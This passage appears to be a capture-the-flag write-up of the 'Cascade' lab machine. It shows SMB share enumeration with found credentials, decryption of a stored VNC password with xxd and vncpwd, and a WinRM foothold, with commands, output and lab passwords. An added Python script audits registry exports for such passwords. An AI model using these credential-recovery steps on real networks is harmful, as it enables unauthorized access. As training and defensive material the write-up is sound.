SMB

I was able to retrieve a data share with the credentials for ryan.

╰─ smbmap -H 10.10.10.182 -u 'r.thompson' -p 'rY4n5eva'
[+] IP: 10.10.10.182:445	Name: cascade.local                                     
        Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	Audit$                                            	NO ACCESS	
	C$                                                	NO ACCESS	Default share
	Data                                              	READ ONLY	
	IPC$                                              	NO ACCESS	Remote IPC
	NETLOGON                                          	READ ONLY	Logon server share 
	print$                                            	READ ONLY	Printer Drivers
	SYSVOL                                            	READ ONLY	Logon server share 

There was an HTML file containing the name of the TempAdmin account.

-- New production network will be going live on Wednesday so keep an eye out for any issues.

-- We will be using a temporary account to perform all tasks related to the network migration and this account will be deleted at the end of 2018 once the migration is complete. This will allow us to identify actions related to the migration in security logs etc. Username is TempAdmin (password is the same as the normal admin account password).

-- The winner of the “Best GPO” competition will be announced on Friday so get your submissions in soon.

There was also a .reg file that allowed me to view a hexed password for VNC.

"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f

We have to join the comma-separated hex bytes into one string, convert it to raw bytes with xxd, and pass the resulting file to the tool called vncpwd.

╰─ echo '6bcf2a4b6e5aca0f' | xxd -r -p > vnc_enc_pass
╰─ ./vncpwd vnc_enc_pass 
Password: sT333ve2
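
From the defender's side, the same .reg format can be audited before it ends up on a readable share. The script below is an added example, not part of the original writeup: it parses a registry export, handles wrapped hex values, and flags 8-byte "Password" values of the kind recovered above. The sample export and its key path are constructed placeholders; only the "Password" line comes from the page.

```python
import re

# Constructed sample export: the key path is a placeholder, only the
# "Password" line is the one shown in the writeup.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\ExampleVNC\Server]
"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f
"Blob"=hex:01,02,03,04,05,06,07,08,\
  09,0a
"RfbPort"=dword:0000170c
'''

VALUE_RE = re.compile(r'^"(?P<name>[^"]+)"=hex(?:\([0-9a-f]+\))?:(?P<data>.*)$', re.I)

def hex_values(reg_text):
    """Yield (key, value_name, raw_bytes) for every hex-typed value."""
    key, pending = None, None
    for line in reg_text.splitlines():
        line = line.strip()
        if pending is not None:            # wrapped value continues here
            name, data = pending[0], pending[1] + line
        elif line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            continue
        else:
            m = VALUE_RE.match(line)
            if not m:
                continue
            name, data = m["name"], m["data"]
        if data.endswith("\\"):            # regedit wraps long values with "\"
            pending = (name, data[:-1])
            continue
        pending = None
        yield key, name, bytes.fromhex(data.replace(",", ""))

def find_stored_passwords(reg_text):
    """Flag hex values whose name mentions 'password'."""
    findings = []
    for key, name, raw in hex_values(reg_text):
        if "password" in name.lower():
            # 8 bytes = one DES block, the size classic VNC password storage
            # uses under a fixed, publicly known key: treat as recoverable.
            findings.append({"key": key, "value": name,
                             "hex": raw.hex(), "vnc_style": len(raw) == 8})
    return findings

if __name__ == "__main__":
    for finding in find_stored_passwords(SAMPLE_REG):
        print(finding)
```

Any hit with `vnc_style` set should be handled as a plaintext credential: rotate it and remove the export from the share.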

Now we have to do the same shit again

I validated the creds with crackmapexec and was able to get a foothold on the machine with WinRM.
